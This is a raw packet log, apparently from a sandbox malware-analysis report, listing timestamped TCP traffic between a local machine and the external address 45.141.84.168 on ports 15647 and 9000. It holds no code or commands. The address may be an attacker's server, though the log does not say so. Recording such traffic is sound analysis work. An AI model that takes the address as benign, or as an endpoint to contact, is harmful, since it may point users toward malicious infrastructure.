                                          Nov 28, 2024 13:40:31.105607033 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.117182970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.117403984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.130101919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.130141020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.130280972 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.145818949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.145836115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.145936966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.159018993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.159209967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.167953014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.168016911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.168031931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.173182964 CET498469000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.182818890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.190613985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.190654993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.190745115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.210109949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.210226059 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.216496944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.222322941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.236593008 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.240248919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.240350962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.240426064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.244340897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.244362116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.244628906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.259406090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.259929895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.260145903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.260303974 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.269686937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.270428896 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.281187057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.281202078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.281366110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.290591955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.290606022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.290719986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.290743113 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.290755987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.290771961 CET90004984145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.290852070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.290901899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.290992022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.291042089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.291201115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.292376995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.297631979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.297751904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.297832012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.301846027 CET90004984645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.304462910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.304562092 CET498469000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.305193901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.305198908 CET498469000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.315764904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.318304062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.330683947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.330816031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.330940962 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.342360020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.342581987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.346940041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.347018003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.347073078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.361630917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.361705065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.369147062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.369175911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.369203091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.371623993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.371701956 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.371850967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.374586105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.374648094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.388730049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.389138937 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.389522076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.389538050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.389561892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.405271053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.405339003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.405428886 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.410696030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.410785913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.417531967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.417599916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.417622089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.425199986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.425256014 CET90004984645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.425270081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.433710098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.433820009 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.433895111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.452080965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.452219963 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.458214045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.458249092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.458278894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.467499971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.467556953 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.482212067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.482456923 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.492103100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.492161989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.509228945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.509390116 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.530731916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.530832052 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.537592888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.540297985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.553831100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.555723906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.578228951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.579320908 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.592534065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.604181051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.605017900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.613738060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.618002892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.619021893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.621334076 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.626907110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.630325079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.634613991 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.636352062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.650537968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.653426886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.653496981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.653594971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.660265923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.660415888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.660485029 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.671294928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.671371937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.671540022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.683113098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.683943033 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.693752050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.693911076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.694156885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.706188917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.710587978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.711899996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.714828014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.715509892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.720869064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.720921993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.720992088 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.726808071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.729362011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.731765032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.731837034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.738909006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.739732981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.739811897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.746659040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.750319958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.755285978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.756447077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.769361973 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.771593094 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.773605108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.773722887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.773734093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.780908108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.786406994 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.789990902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.792360067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.803985119 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.804450989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.804780006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.804835081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.804898024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.815310001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.816343069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.826306105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.828052998 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.828135014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.828248024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.828272104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.835448027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.837318897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.840744972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.840816975 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.840888023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.849376917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.850553036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.853157997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.857743979 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.860305071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.861320019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.876708984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.879648924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.879728079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.879892111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.889413118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.894424915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.894536972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.894551039 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.894699097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.903340101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.904182911 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.912372112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.916405916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.916522980 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.922005892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.922065020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.922128916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.924745083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.930331945 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.940129042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.940195084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.940282106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.948565006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.953023911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.953037977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.953212976 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.958317041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.960316896 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.969943047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.970042944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.970077991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.977766037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.978311062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.992894888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.992957115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.993057013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.005435944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.005515099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.005702972 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.011097908 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.011188984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.011255980 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.027503014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.029448032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.033250093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.033327103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.033428907 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.042102098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.044452906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.050642967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.053363085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.060993910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.061050892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.061162949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.071881056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.074434996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.080302954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.084114075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.084129095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.084228992 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.090676069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.092442036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.104687929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.110469103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.113888025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.113970041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.114048958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.125256062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.125314951 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.125464916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.131248951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.133017063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.137861967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.140006065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.149991035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.150007010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.150098085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.162164927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.162302017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.162363052 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.173485041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.173552036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.179068089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.179156065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.192601919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.192636967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.192676067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.201442957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.206335068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.212234020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.212249994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.212392092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.230474949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.232374907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.232430935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.232480049 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.243550062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.243657112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.243850946 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.251688004 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.254326105 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.260134935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.260330915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.272912979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.273034096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.273144007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.291363001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.291450024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.299562931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.299618006 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.312947035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.313003063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.313038111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.326256037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.326502085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.332421064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.332473040 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.350941896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.351469994 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.354639053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.354702950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.354712963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.365720987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.366264105 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.380287886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.380538940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.382529974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.382607937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.382617950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.393574953 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.393657923 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.405823946 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.405880928 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.411736965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.411834002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.411910057 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.426549911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.426623106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.426770926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.438558102 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.446057081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.446343899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.453896999 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.454955101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.454969883 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.455041885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.467946053 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.472914934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.473088026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.473181963 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:32.485726118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:32.486052036 CET4973015647192.168.2.445.141.84.168
